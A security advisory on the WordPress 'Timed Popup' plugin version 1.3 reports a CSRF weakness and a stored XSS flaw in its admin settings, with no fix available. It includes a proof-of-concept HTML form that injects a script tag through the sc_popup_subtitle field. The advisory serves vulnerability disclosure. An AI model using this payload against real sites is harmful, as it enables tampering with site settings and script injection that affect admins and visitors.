Title: WordPress 'Timed Popup' plugin - CSRF/XSS Version: 1.3 Author: Morten N?rtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/wp-timed-popup/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- WordPress popup is a timed popup box that shows up on your website, and can be used as a call to action to display products, sign up for newsletters, and mainly to get the attention of your website visitors in an appealing and non-intrusive manner. It has an options page which easily allows you to change the title, text, link and allows you to integrate your existing form or newsletter form with Shotcode support. You can easily connect your mailchimp, gravity forms, contact form 7 shortcodes and get subsribers! ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and then submit the following form. <form method="POST" action="http://[DOMAIN]/wp-admin/options-general.php?page=wp-popup.php"> <input type="text" name="sc_popup_subtitle" value="</textarea><script>alert(1)</script>"><br /> <input type="text" name="wp_popup_save" value="Update"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- No fix available.